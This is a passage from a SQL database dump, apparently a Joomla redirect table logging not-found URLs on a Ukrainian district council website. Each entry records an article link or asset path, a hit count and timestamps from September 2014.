06:45:43','0000-00-00 00:00:00',301),(3659,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1049:2013-07-15-05-50-46&catid=11&lang=uk&Itemid=','','','',4,0,'2014-09-21 06:52:03','0000-00-00 00:00:00',301),(3660,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1103:2013-10-03-09-29-30&catid=11&lang=uk','','','',3,0,'2014-09-21 06:59:14','0000-00-00 00:00:00',301),(3661,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1103:2013-10-03-09-29-30&catid=11&lang=ru&Itemid=0','','','',5,0,'2014-09-21 06:59:21','0000-00-00 00:00:00',301),(3662,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1211:-2014-&catid=56&Itemid=97&lang=uk','','','',9,0,'2014-09-21 07:11:49','0000-00-00 00:00:00',301),(3663,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1103:2013-10-03-09-29-30&catid=11&lang=uk&Itemid=0','','','',3,0,'2014-09-21 07:14:35','0000-00-00 00:00:00',301),(3664,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1264:2014-04-01-11-27-13&catid=11&Itemid=14&lang=ru','','','',10,0,'2014-09-21 07:15:10','0000-00-00 00:00:00',301),(3665,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1321:------------------lr-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',1,0,'2014-09-21 07:16:49','0000-00-00 00:00:00',301),(3666,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1319:--------2014--&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',10,0,'2014-09-21 07:23:03','0000-00-00 00:00:00',301),(3667,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=960:-19-&catid=11&lang=ru','','','',3,0,'2014-09-21 07:23:54','0000-00-00 00:00:00',301),(3668,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1323:2014-05-27-13-21-50&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',8,0,'2014-09-21 07:31:11','0000-00-00 00:00:00',301),(3669,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1301:-28-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',8,0,'2014-09-21 07:34:24','0000-00-00 00:00:00',301),(3670,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1330:2014-06-03-06-17-00&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',10,0,'2014-09-21 07:56:09','0000-00-00 00:00:00',301),(3671,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1122:-1-&catid=11&lang=en&Itemid=0','','','',7,0,'2014-09-21 07:59:54','0000-00-00 00:00:00',301),(3672,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1217:2014-02-21-13-52-36&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',9,0,'2014-09-21 08:05:02','0000-00-00 00:00:00',301),(3673,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1117:--------l-r----&catid=53&Itemid=94&lang=en','','','',3,0,'2014-09-21 08:12:29','0000-00-00 00:00:00',301),(3674,'http://www.malyn-rayrada.org.ua/index.php/media/system/images/mootree_loader.gif','','http://www.malyn-rayrada.org.ua/index.php/875-ogoloshennya','',1401,0,'2014-09-21 08:23:31','0000-00-00 00:00:00',301),(3675,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1005:-7-1943-&catid=11&lang=uk','','','',6,0,'2014-09-21 08:23:34','0000-00-00 00:00:00',301),(3676,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1329:2014-06-02-11-51-47&catid=11&lang=ru&Itemid=','','','',10,0,'2014-09-21 08:24:59','0000-00-00 00:00:00',301),(3677,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1265:2014-04-01-11-43-46&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',20,0,'2014-09-21 08:25:15','0000-00-00 00:00:00',301),(3678,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1178:2014-01-21-12-39-34&catid=11&Itemid=14&lang=uk','','','',5,0,'2014-09-21 08:32:04','0000-00-00 00:00:00',301),(3679,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1118:2013-10-25-12-24-30&catid=53:--25102013-&Itemid=94&lang=ru','','','',16,0,'2014-09-21 08:44:43','0000-00-00 00:00:00',301),(3680,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=918:-2013-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',11,0,'2014-09-21 08:49:09','0000-00-00 00:00:00',301),(3681,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1102:2013-10-03-08-08-33&catid=11&lang=uk&Itemid=','','','',1,0,'2014-09-21 08:55:48','0000-00-00 00:00:00',301),(3682,'http://malyn-rayrada.org.ua/images/stories/pagat.php?rf','','','',3,0,'2014-09-21 09:06:44','0000-00-00 00:00:00',301),(3683,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1284:2014-04-17-13-00-18&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',21,0,'2014-09-21 09:10:18','0000-00-00 00:00:00',301),(3684,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1375:-33-6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2014-09-21 09:24:21','0000-00-00 00:00:00',301),(3685,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1179:2014-01-21-12-44-04&catid=11&lang=uk','','','',5,0,'2014-09-21 09:38:46','0000-00-00 00:00:00',301),(3686,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1147:2013-11-28-09-57-12&catid=11&lang=uk','','','',6,0,'2014-09-21 09:39:39','0000-00-00 00:00:00',301),(3687,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1353:2014-07-01-05-08-54&catid=11&Itemid=14&lang=en','','','',1,0,'2014-09-21 09:43:36','0000-00-00 00:00:00',301),(3688,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1353:2014-07-01-05-08-54&catid=11&Itemid=14&lang=ru','','','',1,0,'2014-09-21 09:43:41','0000-00-00 00:00:00',301),(3689,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1353:2014-07-01-05-08-54&catid=11&Itemid=14&lang=uk','','','',1,0,'2014-09-21 09:43:45','0000-00-00 00:00:00',301),(3690,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1171:2014-01-11-09-58-40&catid=11&Itemid=14&lang=ru','','','',12,0,'2014-09-21 09:43:50','0000-00-00 00:00:00',301),(3691,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1354:-lr-&catid=11&Itemid=14&lang=en','','','',1,0,'2014-09-21 09:43:52','0000-00-00 00:00:00',301),(3692,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1354:-lr-&catid=11&Itemid=14&lang=ru','','','',1,0,'2014-09-21 09:43:58','0000-00-00 00:00:00',301),(3693,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1354:-lr-&catid=11&Itemid=14&lang=uk','','','',1,0,'2014-09-21 09:44:01','0000-00-00 00:00:00',301),(3694,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1355:2014-07-02-06-11-04&catid=11&Itemid=14&lang=en','','','',1,0,'2014-09-21 09:44:04','0000-00-00 00:00:00',301),(3695,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1355:2014-07-02-06-11-04&catid=11&Itemid=14&lang=ru','','','',1,0,'2014-09-21 09:44:08','0000-00-00 00:00:00',301),(3696,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1355:2014-07-02-06-11-04&catid=11&Itemid=14&lang=uk','','','',1,0,'2014-09-21 09:44:12','0000-00-00 00:00:00',301),(3697,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1355:2014-07-02-06-11-04&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',1,0,'2014-09-21 09:44:16','0000-00-00 00:00:00',301),(3698,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1355:2014-07-02-06-11-04&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2014-09-21 09:44:20','0000-00-00 00:00:00',301),(3699,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1355:2014-07-02-06-11-04&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',1,0,'2014-09-21 09:44:25','0000-00-00 00:00:00',301),(3700,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1356:2014-07-03-06-32-02&catid=11&Itemid=14&lang=uk','','','',1,0,'2014-09-21 09:44:28','0000-00-00 00:00:00',301),(3701,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1356:2014-07-03-06-32-02&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',1,0,'2014-09-21 09:44:31','0000-00-00 00:00:00',301),(3702,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1280:-2014-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',10,0,'2014-09-21 09:44:35','0000-00-00 00:00:00',301),(3703,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1354:-lr-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',1,0,'2014-09-21 10:04:53','0000-00-00 00:00:00',301),(3704,'http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/media/system/images/mootree_loader.gif','','http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/2010-06-05-12-50-56','',509,0,'2014-09-21 10:35:39','0000-00-00 00:00:00',301),(3705,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=976:2013-03-21-18-42-06&catid=11&lang=uk','','','',2,0,'2014-09-21 10:54:25','0000-00-00 00:00:00',301),(3706,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=956:2013-03-07-14-51-33&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',3,0,'2014-09-21 10:55:25','0000-00-00 00:00:00',301),(3707,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=996:2013-04-25-12-09-57&catid=10&Itemid=17&lang=ru','','','',3,0,'2014-09-21 10:55:46','0000-00-00 00:00:00',301),(3708,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=996:2013-04-25-12-09-57&catid=10:2010-06-05-13-46-44&Itemid=17&lang=uk','','','',8,0,'2014-09-21 10:56:19','0000-00-00 00:00:00',301),(3709,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=882:2012-12-21-17-08-23&catid=46:--21122012&Itemid=85&lang=uk','','','',5,0,'2014-09-21 10:58:49','0000-00-00 00:00:00',301),(3710,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=976:2013-03-21-18-42-06&catid=11&lang=uk&Itemid=','','','',2,0,'2014-09-21 11:00:18','0000-00-00 00:00:00',301),(3711,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1292:-i-&catid=11&lang=en&Itemid=','','','',4,0,'2014-09-21 11:20:14','0000-00-00 00:00:00',301),(3712,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1292:-i-&catid=11&lang=en&Itemid=0','','','',2,0,'2014-09-21 11:25:35','0000-00-00 00:00:00',301),(3713,'http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/index.php?option=com_content&view=article&id=995:-2012-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2014-09-21 11:25:52','0000-00-00 00:00:00',301),(3714,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=882:2012-12-21-17-08-23&catid=46:--21122012&Itemid=85&lang=ru','','','',2,0,'2014-09-21 11:26:52','0000-00-00 00:00:00',301),(3715,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1122:-1-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',5,0,'2014-09-21 11:49:27','0000-00-00 00:00:00',301),(3716,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1327:2014-06-01-11-51-13&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',12,0,'2014-09-21 11:50:18','0000-00-00 00:00:00',301),(3717,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1100:2013-10-02-18-03-10&catid=11&lang=uk','','','',2,0,'2014-09-21 11:50:48','0000-00-00 00:00:00',301),(3718,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1132:2013-11-13-10-02-24&catid=11&lang=ru','','','',6,0,'2014-09-21 11:51:44','0000-00-00 00:00:00',301),(3719,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1327:2014-06-01-11-51-13&catid=11&lang=uk','','','',4,0,'2014-09-21 11:51:51','0000-00-00 00:00:00',301),(3720,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1328:2014-06-01-11-58-56&catid=11&lang=uk','','','',5,0,'2014-09-21 11:52:43','0000-00-00 00:00:00',301),(3721,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1325:2014-05-29-06-00-31&catid=11&lang=uk','','','',5,0,'2014-09-21 11:53:03','0000-00-00 00:00:00',301),(3722,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1227:2014-02-25-07-36-58&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',16,0,'2014-09-21 11:54:00','0000-00-00 00:00:00',301),(3723,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1203:-2014-&catid=56:--03022014-&Itemid=97&lang=ru','','','',7,0,'2014-09-21 11:54:03','0000-00-00 00:00:00',301),(3724,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1069:23--------&catid=11&lang=en&Itemid=','','','',6,0,'2014-09-21 11:54:06','0000-00-00 00:00:00',301),(3725,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1203:-2014-&catid=56:--03022014-&Itemid=97&lang=ru','','','',4,0,'2014-09-21 11:55:18','0000-00-00 00:00:00',301),(3726,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=912:2013-01-22-14-14-06&catid=11&lang=en&Itemid=0','','','',3,0,'2014-09-21 11:55:26','0000-00-00 00:00:00',301),(3727,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1109:2013-10-18-10-25-30&catid=11&lang=ru&Itemid=','','','',4,0,'2014-09-21 11:56:09','0000-00-00 00:00:00',301),(3728,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1101:2013-10-03-07-11-01&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',5,0,'2014-09-21 12:17:33','0000-00-00 00:00:00',301),(3729,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/media/system/images/mootree_loader.gif','','http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-03-57-58','',135,0,'2014-09-21 12:31:03','0000-00-00 00:00:00',301),(3730,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1203:-2014-&catid=56&Itemid=97&lang=ru','','','',3,0,'2014-09-21 12:47:21','0000-00-00 00:00:00',301),(3731,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1187:2014-01-28-09-43-51&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',4,0,'2014-09-21 12:47:25','0000-00-00 00:00:00',301),(3732,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1167:--------l-r-------&catid=55&Itemid=96&lang=uk','','','',7,0,'2014-09-21 12:47:34','0000-00-00 00:00:00',301),(3733,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1215:-1200-&catid=11&lang=ru','','','',6,0,'2014-09-21 12:59:11','0000-00-00 00:00:00',301),(3734,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1250:2014-03-24-07-04-57&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',10,0,'2014-09-21 13:00:04','0000-00-00 00:00:00',301),(3735,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1376:2014-08-22-08-01-53&catid=11&Itemid=14&lang=uk','','','',19,0,'2014-09-21 13:28:52','0000-00-00 00:00:00',301),(3736,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1203:-2014-&catid=56:--03022014-&Itemid=97&lang=uk','','','',2,0,'2014-09-21 14:01:25','0000-00-00 00:00:00',301),(3737,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1172:2014-01-14-14-46-07&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',11,0,'2014-09-21 14:15:21','0000-00-00 00:00:00',301),(3738,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1336:2014-06-10-11-01-06&catid=36&Itemid=70&lang=en','','','',1,0,'2014-09-21 14:21:48','0000-00-00 00:00:00',301),(3739,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1005:-7-1943-&catid=11&lang=ru','','','',3,0,'2014-09-21 14:25:26','0000-00-00 00:00:00',301),(3740,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=994:2013-04-23-08-30-51&catid=50&Itemid=90&lang=en','','','',3,0,'2014-09-21 14:30:18','0000-00-00 00:00:00',301),(3741,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1005:-7-1943-&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-09-21 14:31:32','0000-00-00 00:00:00',301),(3742,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1005:-7-1943-&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-09-21 14:41:47','0000-00-00 00:00:00',301),(3743,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=994:2013-04-23-08-30-51&catid=50&Itemid=90&lang=en','','','',1,0,'2014-09-21 14:45:44','0000-00-00 00:00:00',301),(3744,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=994:2013-04-23-08-30-51&catid=50:--23042013-&Itemid=90&lang=en','','','',4,0,'2014-09-21 14:48:33','0000-00-00 00:00:00',301),(3745,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1172:2014-01-14-14-46-07&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',3,0,'2014-09-21 14:53:16','0000-00-00 00:00:00',301),(3746,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1123:-2013-&catid=53&Itemid=94&lang=en','','','',4,0,'2014-09-21 14:55:39','0000-00-00 00:00:00',301),(3747,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1321:------------------lr-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',13,0,'2014-09-21 14:59:48','0000-00-00 00:00:00',301),(3748,'http://www.malyn-rayrada.org.ua/index.php?option=com_poll&id=10:2013-02-22-07-29-10&lang=uk&Itemid=','','','',1,0,'2014-09-21 15:01:07','0000-00-00 00:00:00',301),(3749,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1123:-2013-&catid=53&Itemid=94&lang=en','','','',3,0,'2014-09-21 15:03:55','0000-00-00 00:00:00',301),(3750,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=921:-18-6-20-2013-&catid=11&Itemid=14&lang=uk','','','',8,0,'2014-09-21 15:11:21','0000-00-00 00:00:00',301),(3751,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1083:-2014-&catid=53&Itemid=94&lang=ru','','','',4,0,'2014-09-21 15:14:53','0000-00-00 00:00:00',301),(3752,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1255:2014-03-27-06-02-11&catid=10&Itemid=17&lang=en','','','',2,0,'2014-09-21 15:15:04','0000-00-00 00:00:00',301),(3753,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1334:2014-06-06-05-54-20&catid=11&Itemid=14&lang=ru','','','',3,0,'2014-09-21 15:15:10','0000-00-00 00:00:00',301),(3754,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1311:-69-1941-1945-&catid=11&Itemid=14&lang=en','','','',9,0,'2014-09-21 15:15:14','0000-00-00 00:00:00',301),(3755,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1098:2013-09-25-09-34-57&catid=11&Itemid=14&lang=en','','','',4,0,'2014-09-21 15:15:27','0000-00-00 00:00:00',301),(3756,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1135:2013-11-15-07-00-15&catid=54:--29112013-&Itemid=95&lang=en','','','',2,0,'2014-09-21 15:15:40','0000-00-00 00:00:00',301),(3757,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1036:2013-06-25-10-02-48&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',5,0,'2014-09-21 15:17:28','0000-00-00 00:00:00',301),(3758,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1311:-69-1941-1945-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',4,0,'2014-09-21 15:17:47','0000-00-00 00:00:00',301),(3759,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1334:2014-06-06-05-54-20&catid=11&Itemid=14&lang=ru','','','',2,0,'2014-09-21 15:19:22','0000-00-00 00:00:00',301),(3760,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1284:2014-04-17-13-00-18&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',8,0,'2014-09-21 15:21:04','0000-00-00 00:00:00',301),(3761,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1323:2014-05-27-13-21-50&catid=59:--20062014-&Itemid=107&lang=en','','','',7,0,'2014-09-21 15:21:21','0000-00-00 00:00:00',301),(3762,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1098:2013-09-25-09-34-57&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',4,0,'2014-09-21 15:24:37','0000-00-00 00:00:00',301),(3763,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=926:2013-02-21-09-02-30&catid=47:-21022013-&Itemid=86&lang=ru','','','',5,0,'2014-09-21 15:25:51','0000-00-00 00:00:00',301),(3764,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/media/system/images/mootree_loader.gif','','http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen','',96,0,'2014-09-21 15:29:25','0000-00-00 00:00:00',301),(3765,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/media/system/images/mootree_loader.gif','','http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-17-09-2014','',298,0,'2014-09-21 15:29:46','0000-00-00 00:00:00',301),(3766,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=926:2013-02-21-09-02-30&catid=47:--21022013-&Itemid=86&lang=ru','','','',4,0,'2014-09-21 15:31:24','0000-00-00 00:00:00',301),(3767,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-17-09-2014/media/system/images/mootree_loader.gif','','http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-17-09-2014/859-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2014-rik','',38,0,'2014-09-21 15:31:52','0000-00-00 00:00:00',301),(3768,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1194:-------------2012-2015--&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',18,0,'2014-09-21 15:37:26','0000-00-00 00:00:00',301),(3769,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1255:2014-03-27-06-02-11&catid=10:2010-06-05-13-46-44&Itemid=17&lang=en','','','',2,0,'2014-09-21 15:38:09','0000-00-00 00:00:00',301),(3770,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1042:-qq-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',7,0,'2014-09-21 15:42:00','0000-00-00 00:00:00',301),(3771,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1334:2014-06-06-05-54-20&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2014-09-21 15:47:36','0000-00-00 00:00:00',301),(3772,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1039:-l-r&catid=51&Itemid=92&lang=en','','','',2,0,'2014-09-21 15:50:20','0000-00-00 00:00:00',301),(3773,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1308:2014-05-05-05-20-51&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2014-09-21 15:50:47','0000-00-00 00:00:00',301),(3774,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1194:-2012-2015-&catid=56:--03022014-&Itemid=97&lang=en','','','',4,0,'2014-09-21 15:53:07','0000-00-00 00:00:00',301),(3775,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=926:2013-02-21-09-02-30&catid=47:-21022013-&Itemid=86&lang=ru','','','',1,0,'2014-09-21 15:55:57','0000-00-00 00:00:00',301),(3776,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1066:-23-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',3,0,'2014-09-21 15:57:24','0000-00-00 00:00:00',301),(3777,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1066:-23-----&catid=11&Itemid=14&lang=en','','','',1,0,'2014-09-21 16:05:28','0000-00-00 00:00:00',301),(3778,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1133:2013-11-14-07-12-22&catid=11&lang=ru','','','',6,0,'2014-09-21 16:05:50','0000-00-00 00:00:00',301),(3779,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1011:2013-05-29-09-51-28&catid=11&Itemid=14&lang=en','','','',5,0,'2014-09-21 16:11:41','0000-00-00 00:00:00',301),(3780,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1194:-------------2012-2015--&catid=36&Itemid=70&lang=en','','','',3,0,'2014-09-21 16:12:34','0000-00-00 00:00:00',301),(3781,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1129:2013-11-06-13-36-25&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',8,0,'2014-09-21 16:16:30','0000-00-00 00:00:00',301),(3782,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1042:-qq-&catid=11&Itemid=14&lang=uk','','','',8,0,'2014-09-21 16:17:11','0000-00-00 00:00:00',301),(3783,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1011:2013-05-29-09-51-28&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',4,0,'2014-09-21 16:18:33','0000-00-00 00:00:00',301),(3784,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1308:2014-05-05-05-20-51&catid=11&Itemid=14&lang=ru','','','',2,0,'2014-09-21 16:19:27','0000-00-00 00:00:00',301),(3785,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1327:2014-06-01-11-51-13&catid=11&lang=en','','','',2,0,'2014-09-21 16:20:23','0000-00-00 00:00:00',301),(3786,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1337:2014-06-10-11-11-42&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',3,0,'2014-09-21 16:20:33','0000-00-00 00:00:00',301),(3787,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1093:-2017-&catid=53:--25102013-&Itemid=94&lang=en','','','',3,0,'2014-09-21 16:20:40','0000-00-00 00:00:00',301),(3788,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1164:2013-12-29-11-46-36&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',5,0,'2014-09-21 16:20:58','0000-00-00 00:00:00',301),(3789,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1201:2014-01-31-07-43-11&catid=56:--03022014-&Itemid=97&lang=en','','','',9,0,'2014-09-21 16:21:04','0000-00-00 00:00:00',301),(3790,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1133:2013-11-14-07-12-22&catid=11&lang=ru','','','',3,0,'2014-09-21 16:28:56','0000-00-00 00:00:00',301),(3791,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1201:2014-01-31-07-43-11&catid=56&Itemid=97&lang=en','','','',3,0,'2014-09-21 16:31:31','0000-00-00 00:00:00',301),(3792,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=894:-2013-2015-&catid=47:--21022013-&Itemid=86&lang=uk','','','',2,0,'2014-09-21 16:31:53','0000-00-00 00:00:00',301),(3793,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1282:-30-6-&catid=11&Itemid=14&lang=en','','','',6,0,'2014-09-21 16:32:27','0000-00-00 00:00:00',301),(3794,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1269:----3110&catid=36&Itemid=70&lang=ru','','','',1,0,'2014-09-21 16:32:30','0000-00-00 